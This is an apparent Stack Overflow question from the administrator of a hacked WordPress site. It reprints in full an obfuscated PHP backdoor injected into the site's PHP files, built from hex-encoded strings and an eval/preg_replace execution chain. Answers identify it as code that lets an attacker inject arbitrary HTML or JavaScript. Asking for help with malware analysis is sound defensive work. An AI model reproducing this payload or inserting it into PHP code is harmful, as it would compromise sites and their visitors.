# Wordpress site hacked: Un obfuscate malicious code

Tags: php, wordpress, encryption, deobfuscation

One of the sites I manage got hacked through a wordpress install in the shared environment.

It looks like some maleware has been injected into all the php files on the server. I've managed to delete all references of the code and changed all the passwords. Subsequently ive been getting failed login attemps from an ip in the ukraine...

```
 <?php 

if (!isset($GLOBALS["\x61\156\x75\156\x61"]))
{
    $ua = strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]);
    if ((!strstr($ua, "\x6d\163\x69\145")) and(!strstr($ua, "\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"] = 1;
}


?>
    <?php 

    $vkvmlmaavg = 'zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfs%x7860%x5c%x7825}X;!sp!*#opo#>>}R%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6N}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x78x5c%x782fq%x5c%x7825>2q%x5c%x7825<#x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%x6c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdo;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%xMPT7-NBFSUT%x5c%x7860LDPT7-U256]y6g]257]y86]267]y74]275]y7:]<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x78{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x780{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860825-bubE{h%x5c%x7825)sutcc%x7824]25%x5c%x7824-%x5c%x7824-!c%x7825%x5c%x787f!<X>b%x5c%x7825Z334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]27fbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x78:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%c%x7825>U<#16,47R57,27R66,#%7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x782*#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)y81]265]y72]254]y76]61]y33]6#]y76]277]y72]265]y39]274]y85]273]yq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%xyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7826<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]if((function_exists("%x6f%142%x5f%163%x74%141%x72%164"%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)#Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x78c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*1x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x78.973:8297f:5297e:56-%x5c%x7878r.985:c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>5!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{hx782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x825)euhA)3of>2bd%x5c%x7825!<5h%x5%x5c%x7825%x5c%x782fh%x5c%x7825)n]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x55c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-sf*#npd%x5c%x782f#)rrd%x5c%x78%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x5)!gj!~<ofmy%x5c%x7825,3,j%25>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782frx7824-%x5c%x7824*<!~!ds]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%7x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%xun>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x}%x5c%x7878;0]=])0#)U!%x5cx5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x76g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]y83]273]y76]277#<%x5c%x7825t2w>#]*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!*>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpetj{fpg)%x5c%x7825%x5c%7f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopw6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x34]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!ufs:~928>>%x5c%x7822:ftmbg39*56A:>c%x7860TW~%x5c%x7824<%x5c%x78ex5c%x787f!>>%x5c%x7822!pd%x5c%x7:55946-tr.984:75983:48984:71TW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%25-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5qmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c37]278]225]241]334]368]32mgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<*x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgQUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x78268]y7f#<!%x5c%x7825tc%x785cq%x5c%x78257%x5c%x782f7#@#7%xx7860{6~6<tfs%x5c%x7825.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x78tpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782sv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%d%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x525z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x525zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#Qw]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!7824-%x5c%x7824<%x5c%x7825j,,*!|%x5%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutj3]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825mfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R2ov{h19275j{hnpd19275fub%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfbqov>*ofmy%x5c%x7825)utjm!|!*5!%x525s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>27-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6FOJ%x5c%x7860GB)fubfsdXA%x5c%452]88]5]48]32M3]317]445]212]445]fmji%x5c%x7878:<##:>:h%x5c%x724!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]760hA%x5c%x7827pd%x5c%x782%x5c%x7825-#+I#)q%x5c%x7825:vt)fubmgoj{hA!osvufs!~<3,j%x5c%x_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x78605)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0x787f%x5c%x787f%x5c%x787F.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ld2]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x78825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x786%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]6f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ft4-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=turn chr(ord($n)-1);} @error_reporting(0); preg_replace("%x2f%50%]281Ld]245]K2]285]Ke]525cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x782%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x58]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6}.;%x5c%x7860UQPMSVD!-id%x5))) { $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){re25)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x74+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x78c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uc%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>%x5c%x7825!|!*)323zbek!~!<b%x5#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%825:<#64y]552]e7y]#>n%x5c%x7825<#37224Ypp3)%x5c%x7825cB%x5c%x7825igj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpd]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%y74]273]y76]252]y85]c%x7825%x5c%x782f#0#%x5c%x782e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,54]y76#<%x5c%x7825tmw!>!#]y84]27525c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x78hmg%x5c%x7825!<12>j%x5c%x782#-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]3", NULL); }4%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%14252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]yx785cq%x5c%x7825%x5c%x7827j>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x78608]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}Ux787f;!opjudovg}k~~9{d%x5c%x7825:osv*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825x2e%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;uA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]2]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6!2p%x5c%x7825!*3>?*2b%x5c%x7825)7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cdc%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x78=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x786x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP56%152%x66%147%x67%42%x2c%163%x73Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj65,d7R17,67R37,#%x5c%x782fq%x556<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x7825x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>76]277]y72]265]y39]271]y83]256]y78]248]y83]256]25}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)x7825!osvufs!*!+A!>!<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%))1%x5c%x782f35.)1%x5c%x782f12]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x78<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6ww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5cc%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#Kc%x7825!*9!%x5c%x7827!hmg%x5c%x782yfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!5r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%) && (!isset($GLOBALS["%x61%156%x75%156%x61"])5c%x782f7^#iubq#%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u25%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%7f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<43]321]464]284]364]6]2/(.*)/epreg_replacekjfgnktllk';
$acpbcdcqwr = explode(chr((169 - 125)), '1655,54,9690,46,6518,63,6253,65,7910,69,223,49,8581,31,7446,62,6068,59,6431,60,9241,70,1801,68,5545,25,8758,56,1605,50,8661,68,9867,70,85,41,7979,55,4228,45,9814,53,1709,36,806,52,417,28,5389,29,3938,67,2879,51,2355,66,4132,36,9736,21,7559,27,4273,58,1137,70,2795,43,8459,54,768,38,4005,39,8034,63,4168,23,3430,64,1909,54,5334,55,477,53,10029,55,4191,37,3375,55,4401,43,8915,56,6491,27,6844,56,9624,66,3661,32,6000,68,6581,43,858,25,5598,32,4686,47,7049,61,595,46,3791,36,9484,34,2630,27,5870,69,5243,34,272,37,2066,47,7350,28,2113,63,4884,44,1490,56,8814,54,8195,32,7685,32,2956,57,2228,33,7206,29,2551,29,641,41,7235,38,7847,63,7586,44,2838,41,3097,55,1305,59,0,52,1427,63,8227,41,3304,49,5630,35,4044,67,4444,22,6900,30,916,33,8991,61,6784,60,9518,51,9355,64,52,33,354,63,2421,68,7811,36,3597,34,7110,40,5136,23,3895,43,1077,60,9982,47,8971,20,530,65,5780,24,6127,60,5075,61,8729,29,1207,28,188,35,309,45,5804,66,7771,40,3220,30,3250,54,2930,26,8368,40,1869,40,5731,49,4802,47,1392,35,3013,50,8097,62,7273,33,3063,34,7186,20,445,32,4111,21,9311,44,732,36,2657,69,2261,33,5570,28,3152,68,5451,29,6983,36,2294,61,1235,70,5665,66,949,58,4928,53,883,33,9052,47,1963,67,9937,45,5159,38,5197,46,3827,43,2580,50,4849,35,1546,59,6187,66,3353,22,2726,23,1007,70,5480,65,5939,61,7019,30,126,62,7306,44,6340,43,9569,55,9183,58,4584,65,3721,70,9757,57,4466,63,2489,62,2030,36,4733,69,3693,28,7150,36,8513,68,8159,36,682,50,4649,37,6318,22,8612,49,7717,54,1745,56,7378,56,3870,25,9128,55,5418,33,10084,22,3494,66,9099,29,6624,59,5033,42,4981,52,8307,61,8268,39,5277,57,3560,37,4331,70,8408,51,6731,53,4529,55,3631,30,6383,48,9419,65,6930,53,2176,52,6683,48,7508,51,8868,47,1364,28,7630,55,2749,46,7434,12');
$krdnhuyxrk = substr($vkvmlmaavg, (38379 - 28273), (35 - 28));
if (!function_exists('bvbkmkuetp'))
{
    function bvbkmkuetp($lkmdhuzumr, $syqugkbwaa)
    {
        $wkmwfztjxy = NULL;
        for ($wpopdgyvwt = 0; $wpopdgyvwt < (sizeof($lkmdhuzumr) / 2); $wpopdgyvwt++)
        {
            $wkmwfztjxy. = substr($syqugkbwaa, $lkmdhuzumr[($wpopdgyvwt * 2)], $lkmdhuzumr[($wpopdgyvwt * 2) + 1]);
        }
        return $wkmwfztjxy;
    };
}
$knticqyoeu = "\x20\57\x2a\40\x62\170\x71\151\x75\171\x62\146\x6d\160\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\60\x36\55\x31\66\x39\51\x29\54\x20\143\x68\162\x28\50\x35\71\x30\55\x34\71\x38\51\x29\54\x20\142\x76\142\x6b\155\x6b\165\x65\164\x70\50\x24\141\x63\160\x62\143\x64\143\x71\167\x72\54\x24\166\x6b\166\x6d\154\x6d\141\x61\166\x67\51\x29\51\x3b\40\x2f\52\x20\167\x68\156\x75\164\x6c\152\x78\153\x70\40\x2a\57\x20";
$lrykfpczcb = substr($vkvmlmaavg, (55025 - 44912), (61 - 49));
$lrykfpczcb($krdnhuyxrk, $knticqyoeu, NULL);
$lrykfpczcb = $knticqyoeu;
$lrykfpczcb = (376 - 255);
$vkvmlmaavg = $lrykfpczcb - 1;
 ?>
```

My question is, what does this code do? I have tried quite a few obfuscation tools but it to no avail. Is anyone able to help decipher this?

Comment: This question is not really suited for StackOverflow. The same question has been posted here: http://security.stackexchange.com/questions/70579/is-this-a-backdoor

Comment: I'm voting to close this question as off-topic because 1. it belongs on security.stackexchange.com and 2. there is a duplicate on security.stackexchange.com

Answer (score 0, accepted):

This question has been answered in another Stack Exchange site: https://security.stackexchange.com/questions/70579/is-this-a-backdoor

Excerpts from that answer:

> This piece of highly obfuscated code contains a program to allow the hacker to dynamically append any HTML or javascript
>
> ...
>
> It appears that a Wordpress vulnerability was introduced by an unpatched version of the MailPoet plugin
>
> ...
>
> The key takeaway from this incident is to backup your data frequently and update your software conscientiously

Answered by https://security.stackexchange.com/users/9312/question-overflow

Comment: The obfuscation makes the code look different. That is what obfuscation does.

Comment: I have seen this answer, but we never installed MailPoet on the wordpress instance. @atornblad, in retrospect, I do  agree this question would be more suited for security.stackexchange.

Comment: @AlexAndrei, you say you de-obfuscated the code, can you perhaps share the deobfuscation?

Comment: I made a mistake. The final code is the same as in the referenced question. Apologies :(

Comment: It could be some other unsafe plugin that is the culprit.